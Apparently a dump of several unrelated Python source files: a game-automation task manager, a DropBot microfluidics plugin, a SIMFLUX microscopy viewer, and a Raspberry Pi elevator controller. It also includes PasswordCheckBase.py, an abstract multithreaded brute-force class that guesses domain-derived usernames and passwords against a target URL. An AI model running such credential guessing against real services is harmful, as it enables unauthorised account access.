self.taskBuffer.singleTask.sanityTimes = sanityTimes
self.taskBuffer.singleTask.useStone = useStone
self.taskBuffer.save(self.taskBufferPath)
def newContinuousTask(self, intervalTime, frequency, sanityTimes: int = 0, useStone: bool = False, minStartMultiple: int = 2):
task = Task(frequency, sanityTimes, useStone)
self.taskRecord = task.copy()
self.automation.reset(task)
self.continuousTask = ContinuousTask(self.automation, intervalTime, minStartMultiple)
self.mainThread = threading.Thread(target=self.continuousTask.run, args=(self.eventTaskEnd,))
self.mainThread.start()
self.taskType = "Continuous"
self.taskBuffer.taskType = "continuousTask"
self.taskBuffer.continuousTask.intervalTime = int(intervalTime / 60)
self.taskBuffer.continuousTask.inlineSingleTask.frequency = frequency
self.taskBuffer.continuousTask.inlineSingleTask.sanityTimes = sanityTimes
self.taskBuffer.continuousTask.inlineSingleTask.useStone = useStone
self.taskBuffer.continuousTask.minStartMultiple = minStartMultiple
self.taskBuffer.save(self.taskBufferPath)
def stopTask(self):
self.taskRecord = None
if self.taskType == "Single":
self.automation.stop()
elif self.taskType == "Continuous":
self.continuousTask.stop()
def bindTaskEndCallback(self, callback):
self.taskEndCallback = callback
def eventTaskEnd(self):
self.taskRecord = None
self.taskEndCallback()
self.taskType = "UNKNOWN"
def updateScreenInfo(self):
try:
self.automation.updateScreenInfo()
except Exception as e:
logger.error(e)
def saveTaskConfig(self):
self.taskBuffer.save(self.taskBufferPath)
def disconnectDevice(self):
self.automation.operate.releaseDevices()
def getInformation(self):
return {
"Performance": recoder.Recoder.getDataset(),
"Task": (self.automation.task.getTaskInfo() if self.automation.task is not None else None) if self.automation is not None else None,
"Screen": self.automation.screen if self.automation is not None else None,
"Resolution": self.automation.operate.getResolution() if self.automation is not None else None,
"DeviceName": self.automation.operate.getDeviceName() if self.automation is not None else None,
"NeuralNetworksStatus": self.neuralNetworksInited,
"ContinuousTask": self.continuousTask.status if self.continuousTask is not None else None,
"TaskType": self.taskType,
"TaskStatus": self.taskType if self.taskType == "UNKNOWN" else (str(self.automation.isRun) if self.taskType == "Single" else self.continuousTask.status),
"LevelInfo": self.automation.getScreenInfo() if self.automation is not None else None,
"FightProgress": self.automation.progress if self.automation is not None else None,
"TaskProgress": [self.automation.task.frequency, self.taskRecord.frequency] if self.taskRecord is not None and self.automation is not None else None,
"TaskBuffer": self.taskBuffer.getAsDict() if self.taskBuffer is not None else None,
"ADBStatus": {"Status": "connecting", "Device": ""} if self.initIng else (
self.automation.operate.getDevicesConnectionStatus() if self.automation is not None else {"Status": "disconnected", "Device": ""}),
}
def getSystemInfo(self):
results = {"CPU": [], "GPU": []}
physical_devices = GPUtil.getGPUs()
pc_mem = psutil.virtual_memory()
for cpu in tf.config.experimental.list_physical_devices('CPU'):
results["CPU"].append({"name": cpu.name, "maxMemory": self.memoryToString(pc_mem.available), "memoryValue": float(pc_mem.available)})
index = 0
for gpu in tf.config.experimental.list_physical_devices('GPU'):
results["GPU"].append({"name": gpu.name, "maxMemory": self.memoryToString(physical_devices[index].memoryFree * 1024 * 1024), "memoryValue": float(physical_devices[index].memoryFree),
"description": physical_devices[index].name})
index += 1
return results
@staticmethod
def memoryToString(memory: int):
if memory < 1024:
return str(memory) + "B"
elif memory < 1024 * 1024:
return str(round(memory / 1024, 2)) + "KB"
elif memory < 1024 * 1024 * 1024:
return str(round(memory / 1024 / 1024, 2)) + "MB"
else:
return str(round(memory / 1024 / 1024 / 1024, 2)) + "GB"
class TaskBuffer:
def __init__(self, **kwargs):
self.singleTask: TaskBuffer.SingleTask = kwargs.get("singleTask", TaskBuffer.SingleTask())
self.continuousTask: TaskBuffer.ContinuousTask = kwargs.get("continuousTask", TaskBuffer.ContinuousTask())
self.taskType: str = kwargs.get("taskType", "single")
def load(self, path):
if not os.path.exists(path):
with open(path, "w") as f:
f.write('{"singleTask": {}, "continuousTask": {}}')
try:
with open(path, "r") as f:
data = json.load(f)
self.singleTask = TaskBuffer.SingleTask(**data["singleTask"])
self.continuousTask = TaskBuffer.ContinuousTask(**data["continuousTask"])
except Exception as e:
logger.error(e)
def save(self, path):
with open(path, "w") as f:
json.dump({
"singleTask": self.singleTask.__dict__,
"continuousTask": self.continuousTask.getAsDict(),
"taskType": self.taskType
}, f)
def getAsDict(self):
return {
"singleTask": self.singleTask.__dict__,
"continuousTask": self.continuousTask.getAsDict(),
"taskType": self.taskType
}
class SingleTask:
def __init__(self, **kwargs):
self.frequency = kwargs.get("frequency", 3)
self.sanityTimes = kwargs.get("sanityTimes", 0)
self.useStone = kwargs.get("useStone", False)
class ContinuousTask:
def __init__(self, **kwargs):
self.intervalTime = kwargs.get("intervalTime", 180)
self.minStartMultiple = kwargs.get("minStartMultiple", 1)
self.inlineSingleTask: TaskBuffer.SingleTask = TaskBuffer.SingleTask(**kwargs.get("inlineSingleTask", {}))
def getAsDict(self):
return {
"intervalTime": self.intervalTime,
"minStartMultiple": self.minStartMultiple,
"inlineSingleTask": self.inlineSingleTask.__dict__
}
|
__init__.py
|
import asyncio
import json
import threading
from threading import Thread
import numpy as np
import pydash as _
from si_prefix import si_format, si_parse
from dropbot import SerialProxy
from micropede.client import MicropedeClient , dump_stack
from micropede.async import MicropedeAsync
SCHEMA = {
"type": "object",
"properties": {
"voltage": {
"type": "number",
"default": 100,
"per_step": True
},
"frequency": {
"type": "number",
"default": 10000,
"per_step": False
},
"__hv_output_enabled__": {
"type": "boolean",
"default": False
},
"__hv_output_selected__": {
"type": "boolean",
"default": True
},
"__channel_count__": {
"type": "integer",
"default": 0
},
"__capacitance_update_interval_ms__": {
"type": "integer",
"default": 0,
"minimum": 0
},
"__target_capacitance__": {
"type": "number",
"default": 0
}
}
}
def setup_serial_proxy(self):
class Y(object): pass
Y.control_board = None
Y.ready_event = threading.Event()
Y.err = False
def start_thread(x):
try:
x.control_board = SerialProxy()
except Exception as e:
x.err = e
x.ready_event.set()
t = Thread(target=start_thread, args=(Y,))
t.start()
Y.ready_event.wait()
if (Y.err):
raise(Y.err)
self.control_board = Y.control_board
APPNAME = "scicad"
class DropBot(MicropedeClient):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
async def update_board_info(self):
info = {}
_.assign(info, json.loads(self.control_board.config.to_json()))
_.assign(info, json.loads(self.control_board.state.to_json()))
_.assign(info, json.loads(self.control_board.properties.to_json()))
_.assign(info, {"uuid": str(self.control_board.uuid)})
await self.set_state('info', info)
def listen(self):
setup_serial_proxy(self)
self.control_board.hv_output_enabled = True
self.control_board.hv_output_selected = True
self.on_put_msg("frequency", self.put_frequency)
self.on_put_msg("voltage", self.put_voltage)
self.on_trigger_msg("connect-dropbot", self.connect_dropbot)
self.on_trigger_msg("measure-capacitance", self.measure_capacitance)
self.on_trigger_msg("measure-voltage", self.measure_voltage)
self.on_trigger_msg("put-voltage-frequency", self.put_voltage_frequency)
self.on_state_msg("electrodes-model", "active-electrodes", self.turn_on_electrodes)
self.on_state_msg("electrodes-model", "voltage", self.change_voltage)
self.on_state_msg("electrodes-model", "frequency", self.change_frequency)
self.on_state_msg("dropbot-ui-plugin", "{key}", self.modify_status)
self.wait_for(self.update_board_info())
async def change_voltage(self, voltage, params):
try:
print("CHANGING :) VOLTAGE!!!")
# Convert payload from si_unit string to number
print("CALLING PSI PARSE:", voltage);
voltage = si_parse(_.replace(voltage, "V", ""))
print("ITS NOW: ", voltage)
await self.put_voltage({"voltage": voltage}, {})
await self.update_board_info()
except Exception as e:
print("Error setting voltage")
print(e)
async def change_frequency(self, frequency, params):
try:
print("FREQ", frequency)
frequency = si_parse(_.replace(frequency, "Hz", ""))
await self.put_frequency({"frequency": frequency}, params)
await self.update_board_info()
except Exception as e:
print("Error setting frequency")
print(e)
async def put_voltage_frequency(self, payload, params):
self.control_board.voltage = float(payload["voltage"])
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
async def turn_on_electrodes(self, payload, params):
# Get the three object from device-model
scicad = MicropedeAsync(APPNAME,port=self.port,loop=self.loop)
three_object = await scicad.get_state('device-model', 'three-object')
active_electrodes = payload
def active_filter(obj):
return _.includes(active_electrodes, obj["id"])
active_objects = _.filter_(three_object, active_filter)
channels = _.map_(_.map_(active_objects, "channel"), int)
max_channels = self.control_board.number_of_channels
channel_states = np.zeros(max_channels, dtype=int)
channel_states[channels] = 1
self.control_board.set_state_of_channels(channel_states)
print(self.control_board.state_of_channels)
await self.update_board_info()
async def measure_voltage(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
voltage = self.control_board.measure_voltage()
self.notify_sender(payload, voltage, "measure-voltage")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-voltage", "failed")
async def measure_capacitance(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
capacitance = self.control_board.measure_capacitance()
self.notify_sender(payload, capacitance, "measure-capacitance")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-capacitance", "failed")
async def connect_dropbot(self, payload, params):
try:
setup_serial_proxy(self)
await self.update_board_info()
self.notify_sender(payload, "connected!", "connect-dropbot")
except Exception as e:
print("ERROR::", e)
self.notify_sender(payload, dump_stack(self.name, e),
"connect-dropbot", "failed")
async def put_frequency(self, payload, params):
""" Set the switching frequency of the active fluxels"""
try:
self.validate_schema(payload)
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
self.notify_sender(payload, self.control_board.frequency, "frequency")
except Exception as e:
print(e)
self.notify_sender(payload, dump_stack(self.client.name, e),
"frequency", "failed")
async def put_voltage(self, payload, params):
""" Set the on voltage for fluxels"""
try:
print("PUT VOLTAGE CALLED!")
self.validate_schema(payload)
self.control_board.voltage = float(payload["voltage"])
print("SETTING STATE OF VOLTAGE TO:", payload["voltage"])
print("SETTING STATE!!")
await self.update_board_info()
print("SET SUCCESSFUL")
self.notify_sender(payload, self.control_board.voltage, "voltage")
except Exception as e:
print(e)
self.notify_sender(payload, dump_stack(self.client.name, e),
"voltage", "failed")
print("Running dropbot plugin")
dropbot = DropBot("scicad", host="localhost", port=1884, name="dropbot")
|
app.py
|
import sys,os
#if __name__ == "__main__":
# basedir=os.path.abspath(os.path.dirname(__file__) + '/../..')
# print(basedir)
# os.chdir(basedir)
# sys.path.append(basedir)
import numpy as np
import tqdm
from PyQt5.QtWidgets import QApplication, QLineEdit, QFileDialog, QDialog,QVBoxLayout
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import pyqtSlot
import time
import matplotlib.pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import pickle
import simflux.ui.main_ui as main_ui
import simflux.ui.linklocs_ui as linklocs_ui
from simflux.ui.progressbar import ProgressBar
import threading
import json
import simflux.tiff_to_locs as tiff_to_locs
import simflux.extract_rois as extract_rois
from smlmlib.util import imshow_hstack
import simflux.locs_to_pattern as simflux_pattern
from simflux.ui.drift_correct_dlg import DriftCorrectionDialog
class LinkLocsDialog(QDialog):
def __init__(self, parent):
super().__init__(parent)
self.ui = linklocs_ui.Ui_Dialog()
self.ui.setupUi(self)
self.ui.btnBrowse.clicked.connect(self._onBrowse)
self.ui.btnEstimate.clicked.connect(self.estimate)
def setLocsFile(self,fn):
self.ui.txtLocsFile.setText(fn)
def _onBrowse(self):
options = QFileDialog.Options()
# options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getOpenFileName(self,"", "","All Files (*);;HDF5 Files (*.hdf5)", options=options)
if fileName:
self.ui.txtLocsFile.setText(fileName)
def estimate(self):
from utils.link_locs import estimate_on_time
maxdist = self.ui.maxDistance.value()
frameskip = self.ui.frameskip.value()
fig,bins,framecounts = estimate_on_time(self.ui.txtLocsFile.text(),maxdist,frameskip)
import simflux.ui.qtplot as qtplot
plotdlg=qtplot.PlotDialog(fig,self)
plotdlg.setModal(True)
plotdlg.show()
def getWidgetValues(widgets):
d={}
for w in widgets:
if type(w) == QtWidgets.QDoubleSpinBox or type(w) == QtWidgets.QSpinBox:
v = w.value()
elif type(w) == QLineEdit:
v = w.text()
else:
continue
d[w.objectName()] = v
return d
def setWidgetValues(widgets,values):
for w in widgets:
if w.objectName() in values:
v = values[w.objectName()]
if type(w) == QtWidgets.QDoubleSpinBox or type(w) == QtWidgets.QSpinBox:
w.setValue(v)
elif type(w) == QLineEdit:
w.setText(v)
class Window(QDialog):
localizeDone = QtCore.pyqtSignal()
roiExtractionDone = QtCore.pyqtSignal()
def __init__(self):
super().__init__()
self.title = 'SIMFLUX Viewer'
self.ui = main_ui.Ui_Dialog()
ui=self.ui
ui.setupUi(self)
ui.btnBrowseTiff.clicked.connect(self.onBrowseTiff)
ui.btnEstimAnglePitch.clicked.connect(self.estimAnglePitch)
ui.btnEstimPhaseDepth.clicked.connect(self.estimPhaseDepth)
ui.btnLocalize.clicked.connect(self.localize)
ui.btnLinkLocs.clicked.connect(self.linklocs)
ui.btnBrowseCameraOffset.clicked.connect(self.onBrowseCameraOffsetFile)
ui.btnBrowseROIs.clicked.connect(self.onBrowseROIFile)
ui.btnFixDepth.clicked.connect(self.onFixDepth)
ui.btnDriftCorrection.clicked.connect(self.onDriftCorrection)
ui.btnExtractROIs.clicked.connect(self.onExtractROIs)
ui.btnLoadMod.clicked.connect(self.onLoadMod)
ui.btnSaveMod.clicked.connect(self.onSaveMod)
ui.btnRunSimflux.clicked.connect(self.simflux)
self.localizeDone.connect(self.onLocalizeDone)
self.roiExtractionDone.connect(self.onROIExtractionDone)
self.cfgFile = 'simflux/ui/ui-cfg.json'
self.cfgWidgets = {
ui.fixDepth,
ui.roisize,
ui.gain,
ui.offset,
ui.detectionThreshold,
ui.maxpitch,
ui.minpitch,
ui.numPhaseSteps,
ui.pixelsize,
ui.psfSigmaX, ui.psfSigmaY,
ui.tiffPath,
ui.smlmLocsFile,
ui.txtCameraOffsetFile,
ui.startFrame,
ui.maxLinkDistance,
ui.maxLinkFrameskip,
ui.txtROIFile,
ui.roiExtractMinSpotFrames,
ui.roiExtractSpotFrames,
ui.roiExtractAppend,
ui.maxLinkDistanceIntensity,
ui.angle0, ui.angle1, ui.pitch0, ui.pitch1
}
self.load()
def onDriftCorrection(self):
dlg = DriftCorrectionDialog(self, self.ui.smlmLocsFile.text())
dlg.show()
def load(self):
path = os.path.abspath(os.curdir+"/"+self.cfgFile)
print(f"Loading UI state from {path}")
if os.path.exists(self.cfgFile):
with open(self.cfgFile,'r') as f:
d = json.load(f)
setWidgetValues(self.cfgWidgets,d)
def save(self):
d = getWidgetValues(self.cfgWidgets)
with open(self.cfgFile,'w') as f:
json.dump(d,f,indent=4)
def closeEvent(self,event):
self.save()
def linklocs(self):
dlg = LinkLocsDialog(self)
dlg.setLocsFile(self.ui.smlmLocsFile.text())
dlg.show()
def updatePaths(self):
tiff_path = self.ui.tiffPath.text()
locs_fn = os.path.splitext(tiff_path)[0]+".hdf5"
self.ui.smlmLocsFile.setText(locs_fn)
rois_path = os.path.splitext(tiff_path)[0]+".rois"
self.ui.txtROIFile.setText(rois_path)
def onBrowseCameraOffsetFile(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse image/movie to use as offset:", "","All Files (*);;TIFF File (*.tif)", options=options)
if fileName:
self.ui.txtCameraOffsetFile.setText(fileName)
def onBrowseROIFile(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse ROI file", "","All Files (*);;TIFF File (*.tif)", options=options)
if fileName:
self.ui.txtROIFile.setText(fileName)
def onBrowseTiff(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse TIFF", "","All Files (*);;TIFF File (*.tif)", options=options)
if fileName:
self.ui.tiffPath.setText(fileName)
self.updatePaths()
def onLoadMod(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse mod pickle", "","All Files (*);;Pickle files (*.pickle)", options=options)
if fileName:
with open(fileName, "rb") as pf:
mod = pickle.load(pf)['mod']
self.setModulation(mod)
def onSaveMod(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getSaveFileName(self,"Browse mod pickle", "","All Files (*);;Pickle files (*.pickle)", options=options)
if fileName:
mod = self.getModulation()
phase, depth, relint = self.getPhaseDepth()
angle, pitch = self.getAngleAndPitch()
mod_info = {"mod": mod, "pitch": pitch, "angles": angle, "phase": phase, "depth": depth}
with open(fileName, "wb") as df:
pickle.dump(mod_info, df)
def getModulation(self):
angles,pitch = self.getAngleAndPitch()
phase,depth,relint = self.getPhaseAndDepth()
return simflux_pattern.compute_mod(self.getPatternFrames(), angles, pitch, phase, depth, relint)
def setModulation(self, mod):
angles,pitch = simflux_pattern.mod_angle_and_pitch(mod,self.getPatternFrames())
pf = self.getPatternFrames()
self.setAngleAndPitch(angles,pitch)
self.setPhaseDepth(mod[:,3][pf], mod[:,2][pf], mod[:,4][pf])
def getPatternFrames(self):
phase_steps=self.ui.numPhaseSteps.value()
pattern_frames=np.array([np.arange(0,phase_steps*2,2),np.arange(0,phase_steps*2,2)+1])
return pattern_frames
def estimAnglePitch(self):
freq_minmax=[2*np.pi/self.ui.maxpitch.value(),2*np.pi/self.ui.minpitch.value()]
pattern_frames=self.getPatternFrames()
angles,pitch=simflux_pattern.estimate_pitch_and_angle(self.ui.smlmLocsFile.text(),pattern_frames,freq_minmax)
self.setAngleAndPitch(angles,pitch)
def onExtractROIs(self):
locs_fn = self.ui.smlmLocsFile.text()
tiff_path = self.ui.tiffPath.text()
rois_path = self.ui.txtROIFile.text()
pbar = ProgressBar("Extracting ROIs and estimating spot background and intensity")
def progress_update(msg,done):
if msg is not None:
pbar.setMsg.emit(msg)
if done is not None:
pbar.update.emit(done)
return not pbar.abortPressed
cfg = self.getConfig()
cfg = {**cfg,
'maxlinkdistXY': self.ui.maxLinkDistance.value(),
'maxlinkdistI': self.ui.maxLinkDistanceIntensity.value(),
'maxlinkframeskip': self.ui.maxLinkFrameskip.value()
}
maxroiframes = self.ui.roiExtractSpotFrames.value()
minroiframes = self.ui.roiExtractMinSpotFrames.value()
appendFrames = self.ui.roiExtractAppend.value()
def process_thread():
self.rois,self.roiframes = extract_rois.extract_rois(rois_path, tiff_path, cfg, minroiframes,
maxroiframes, appendFrames, locs_fn, progress_update)
if not pbar.abortPressed:
self.roiExtractionDone.emit()
t = threading.Thread(target=process_thread)
t.start()
pbar.show()
def onViewROIs(self):
rois_path = self.ui.txtROIFile.text()
roidata = extract_rois.ROIData.load(rois_path)
plt.figure()
for k in range(20):
imshow_hstack(roidata.frames[k])
def setAngleAndPitch(self,angles,pitch):
ad = np.rad2deg(angles)
pixelsize = self.ui.pixelsize.value()
p = pitch*pixelsize
self.ui.angle0.setValue(ad[0])
self.ui.angle1.setValue(ad[1])
self.ui.pitch0.setValue(p[0])
self.ui.pitch1.setValue(p[1])
def onFixDepth(self):
phase,depth,relint=self.getPhaseAndDepth()
depth[:,:]=self.ui.fixDepth.value()
self.setPhaseDepth(phase,depth,relint)
def getAngleAndPitch(self):
angle = np.array( [ self.ui.angle0.value(), self.ui.angle1.value() ] )
pitch = np.array( [ self.ui.pitch0.value(), self.ui.pitch1.value() ] )
angle = np.deg2rad(angle)
pitch_in_pixels = pitch / self.ui.pixelsize.value()
return angle,pitch_in_pixels
def estimPhaseDepth(self):
locs_fn = self.ui.smlmLocsFile.text()
angle,pitch = self.getAngleAndPitch()
pattern_frames = self.getPatternFrames()
phase, depth, relint = simflux_pattern.estimate_phase_and_depth(locs_fn, angle, pitch, pattern_frames)
self.setPhaseDepth(phase,depth,relint)
def setPhaseDepth(self,phase,depth,relint):
tbl = self.ui.tableMod
pattern_frames = self.getPatternFrames()
phase_steps = self.ui.numPhaseSteps.value()
tbl.setRowCount(len(pattern_frames.flatten()))
tbl.setColumnCount(4)
headers = ['Axis', 'Phase (deg)', 'Depth', 'Rel. intensity']
tbl.setHorizontalHeaderLabels(headers)
phase = np.rad2deg(phase)
for i, pf in enumerate(pattern_frames):
for step, fn in enumerate(pf):
lbl = QtWidgets.QLabel()
lbl.setText(str(i))
tbl.setCellWidget(i*phase_steps+step, 0, lbl)
w = QtWidgets.QLabel()
w.setText(f"{phase[i,step]:.5f}")
tbl.setCellWidget(i*phase_steps+step, 1, w)
w = QtWidgets.QLabel()
w.setText(f"{depth[i,step]:.5f}")
tbl.setCellWidget(i*phase_steps+step, 2, w)
w = QtWidgets.QLabel()
w.setText(f"{relint[i,step]:.5f}")
tbl.setCellWidget(i*phase_steps+step, 3, w)
def getPhaseAndDepth(self):
tbl = self.ui.tableMod
pattern_frames = self.getPatternFrames()
numaxis = len(pattern_frames)
numsteps = self.ui.numPhaseSteps.value()
phase = np.zeros((numaxis,numsteps))
depth = np.zeros((numaxis,numsteps))
relint = np.zeros((numaxis,numsteps))
for i in range(numaxis):
for j in range(numsteps):
phase[i,j]=float(tbl.cellWidget(i*numsteps+j,1).text())
depth[i,j]=float(tbl.cellWidget(i*numsteps+j,2).text())
relint[i,j]=float(tbl.cellWidget(i*numsteps+j,3).text())
return np.deg2rad(phase),depth,relint
def getConfig(self):
offset = self.ui.offset.value()
offsetFile = self.ui.txtCameraOffsetFile.text()
if len(offsetFile)>0:
offset = offsetFile
sigmaX= self.ui.psfSigmaX.value()
sigmaY = self.ui.psfSigmaY.value()
cfg = {
'sigma': [sigmaX, sigmaY],
'roisize': self.ui.roisize.value(),
'threshold': self.ui.detectionThreshold.value(),
'gain': self.ui.gain.value(),
'offset': offset,
'startframe': self.ui.startFrame.value()
}
return cfg
def simflux(self):
rois_path = self.ui.txtROIFile.text()
sf_fn = os.path.splitext(rois_path)[0]+"_sf.hdf5"
g2d_fn = os.path.splitext(rois_path)[0]+"_g2d.hdf5"
sigma = self.getConfig()['sigma']
mod = self.getModulation()
rd = extract_rois.ROIData.load(rois_path)
print(f"Estimating with 2D Gauss..")
results = extract_rois.localize(rd.rois,rd.frames,sigma,mod=None)
results.SaveHDF5(g2d_fn, rd.imgshape)
print(f"Estimating with SIMFLUX..")
results = extract_rois.localize(rd.rois,rd.frames,sigma,mod=mod)
results.SaveHDF5(sf_fn, rd.imgshape)
def localize(self):
tiff_path = self.ui.tiffPath.text()
if not os.path.exists(tiff_path):
return
cfg = self.getConfig()
locs_fn = self.ui.smlmLocsFile.text()
est_sigma = self.ui.checkEstimSigma.isChecked()
self.ui.labelLocsInfo.setText('')
pbar = ProgressBar("Running spot detection and 2D Gaussian localization...")
def progress_update(msg,done):
if msg is not None:
pbar.setMsg.emit(msg)
if done is not None:
pbar.update.emit(done)
return not pbar.abortPressed
def localize_thread():
print (f"Localize thread: {threading.get_ident()}")
self.results, self.imgshape = tiff_to_locs.localize(tiff_path, cfg, locs_fn, progress_update, est_sigma)
if not pbar.abortPressed:
self.localizeDone.emit()
t = threading.Thread(target=localize_thread)
t.start()
pbar.show()
@QtCore.pyqtSlot()
def onLocalizeDone(self):
print("localize done")
if 'sx' in self.results.colnames:
sx = self.results.estim[:, self.results.ColIdx('sx')]
sy = self.results.estim[:, self.results.ColIdx('sy')]
self.ui.psfSigmaX.setValue(np.median(sx))
self.ui.psfSigmaY.setValue(np.median(sy))
plt.figure()
plt.hist([sx,sy],label=['Sigma X','Sigma Y'],range=(1,3),bins=30)
plt.legend()
plt.xlabel('PSF Sigma [pixels]')
plt.show()
self.showLocsInfo()
@QtCore.pyqtSlot()
def onROIExtractionDone(self):
print("roi extraction done")
def showLocsInfo(self):
m_crlb_x = np.median(self.results.CRLB()[:,0])
m_bg= np.median(self.results.estim[:,3])
self.ui.labelLocsInfo.setText(f"#Spots: {len(self.results.estim)}. Imgsize:{self.imgshape[0]}x{self.imgshape[1]} pixels. Median CRLB X: {m_crlb_x:.2f} [pixels], bg:{m_bg:.1f}")
def run_ui():
app = QApplication.instance()
if app is None:
app = QApplication(sys.argv)
wnd = Window()
wnd.show()
wnd.activateWindow()
app.exec_()
# del tqdm # prevent exception at exit about not being able to join thread
del app # prevent IPython+Qt issue https://github.com/spyder-ide/spyder/issues/2970
if __name__ == '__main__':
run_ui()
|
PasswordCheckBase.py
|
# -*- coding: utf-8 -*-
# !/usr/bin/env/ python3
"""
Author: Rookie
E-mail: hyll8882019@outlook.com
"""
import tldextract
from collections import deque
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse
from RookieTools.CheckBase import CheckBase, abstractmethod
from RookieTools.logger import logger
from RookieTools import show_run_time, is_url
import warnings
class PassWordCheckBase(CheckBase):
PluginName = None
ThreadNumber = 10
DEBUG = False
def __init__(self, target: str, *args, **kwargs):
self.url = target
self.result = None
self.username_task = deque()
self.password_task = deque()
self.__password_task = None
super(PassWordCheckBase, self).__init__()
@abstractmethod
def init_check(self) -> bool:
pass
@abstractmethod
def tasks_init(self):
pass
@abstractmethod
def check(self, username, password) -> bool:
pass
def init_domain_pass(self, is_user: bool = True, is_pass: bool = True):
if not is_url(self.url.lower()):
self.url = 'http://' + self.url.lower()
try:
domain = urlparse(self.url).netloc
except ValueError:
logger.warning('parse url fail: %s' % self.url)
return
tld = tldextract.extract(domain)
sub_domain = tld.subdomain
if '.' in sub_domain:
sub_domain = sub_domain.split('.')
else:
sub_domain = [sub_domain, ]
domains = [
'%s' % tld.domain,
'%s%s' % (tld.domain, tld.suffix), '%s%s%s' % (''.join(sub_domain), tld.domain, tld.suffix),
'%s_%s' % (tld.domain, tld.suffix), '%s_%s_%s' % ('_'.join(sub_domain), tld.domain, tld.suffix),
'%s.%s' % (tld.domain, tld.suffix), '%s.%s.%s' % ('.'.join(sub_domain), tld.domain, tld.suffix)
]
if is_user:
[self.username_task.append(i) for i in domains]
if is_pass:
[self.password_task.append(i) for i in domains]
def clean_tasks(self):
with self.task_lock:
if len(self.password_task) or len(self.username_task):
logger.info('% -40s正在清空任务队列. 请稍后....' % self.url)
self.username_task.clear()
self.password_task.clear()
if self.__password_task:
self.__password_task.clear()
def is_exist(self):
return self.result is not None
def work_in(self, username: str, *args, **kwargs):
while True:
try:
password = self.__password_task.popleft()
except IndexError:
break
if self.check(username, password) and self.result:
with self.file_lock:
self.pipe(self.result)
self.clean_tasks()
@abstractmethod
def pipe(self, result):
pass
@show_run_time('PasswordCheck')
def run(self):
status = self.init_check()
logger.info('% -40s %s %s' % (self.url, self.PluginName, '初始化检查正常' if status else '初始化检查不正常'))
if status:
self.tasks_init()
while True:
try:
username = self.username_task.popleft()
except IndexError:
break
self.__password_task = self.password_task.copy()
thds = [Thread(target=self.work_in, args=(username,)) for _ in range(self.ThreadNumber)]
[thd.start() for thd in thds]
[thd.join() for thd in thds]
def pool(targets: list, obj: PassWordCheckBase):
warnings.warn("RookieTools.PasswordCheckBase.pool is deprecated since RookieTools 2.0."
"Use RookieTools.pool instead.", DeprecationWarning, stacklevel=2)
_pool = ThreadPoolExecutor()
_pool.map(obj, targets)
_pool.shutdown()
|
Test.py
|
# Refer to the following link for PyQt documentation:
# http://pyqt.sourceforge.net/Docs/PyQt4/classes.html
# Written for AMIS-30543 driver.
'''
At an RPM of 60 and an input of 200 steps in mode 1/1, takes motor 1 second to complete task
At an RPM of 120 and an input of 200 steps in mode 1/2, takes motor 1 second to complete task
'''
import sys
import RNELBanner_rc
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import QPalette
from serial import *
#imports for multithreading
from threading import Thread, Event
import multiprocessing
import math
import socket
import os
import signal
import RPi.GPIO as GPIO
##### imports for picamera
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import cv2
import numpy as np
from scipy.misc import imresize
import globalvars
import struct
import Queue
##### end
minHeight, maxHeight = 0, 200000
#global doorclose
#doorclose = True
try:
arduino = Serial('/dev/ttyACM0', 9600)
print("successfully connected to orig arduino!")
except:
arduino = None
pass
try:
arduinoservodoor = Serial('/dev/ttyACM1', 9600)
print("successfully connected to servo arduino!")
except:
arduinoservodoor = None
pass
try:
arduinoCapSense = Serial('/dev/ttyACM2', 115200)
print("successfully connected to cap sensor arduino!")
except:
arduinoCapSense = None
pass
#doorclose = True
target = open("/home/kemerelab/Desktop/CapSenseData.out", 'w')
class Capacitance(QtCore.QThread):
# def __init__(self, threadID, name):
# Thread.__init__(self)
# self.threadID = threadID
# self.name = capacitiveSensorThread
def run(self):
while globalvars.quitThread == False:
if (arduinoCapSense is not None):
arduinoCapSense.flushInput()
capdatatotal = arduinoCapSense.readline()
target.write(capdatatotal)
self.emit(QtCore.SIGNAL('CAP'), capdatatotal)
time.sleep(1.5)
class Ui_Form(QtGui.QWidget):
def __init__(self):
super(Ui_Form, self).__init__()
self.currentPosition = 0
self.level_position = {1:0, 2:1000, 3:2000}
# self.doorclose = True
self.setupUi()
def closeEvent(self, event):
target.close()
globalvars.quitThread = True
time.sleep(1)
t2.join()
print "User has clicked the red x on the main window"
event.accept()
def setupUi(self):
#self.threadclass = level()
#self.threadclass.start()
#self.connect(self, QtCore.SIGNAL('LEVEL'), self.threadclass)
self.setWindowTitle("RNEL Elevator Controller")
rowSpacer = QtGui.QSpacerItem(1, 20)
columnSpacer = QtGui.QSpacerItem(50, 1)
# Highlight input that is currently selected
self.setFocusPolicy(QtCore.Qt.ClickFocus)
# Create UI elements
label_banner = QtGui.QLabel()
label_banner.setText("")
label_banner.setPixmap(QtGui.QPixmap(":/RNELicon/RNELBanner.png"))
font = QtGui.QFont("Helvetica", 12, 75)
font.setBold(True)
label_motorState = QtGui.QLabel("Stepper Motor Parameters")
label_motorState.setFont(font)
# label_task = QtGui.QLabel("Select a Task")
# label_time = QtGui.QLabel("Time Between Levels (seconds):")
label_steps = QtGui.QLabel("Distance (in):")
label_wheeldiameter = QtGui.QLabel("Wheel Diameter (in)")
label_direction = QtGui.QLabel("Direction:")
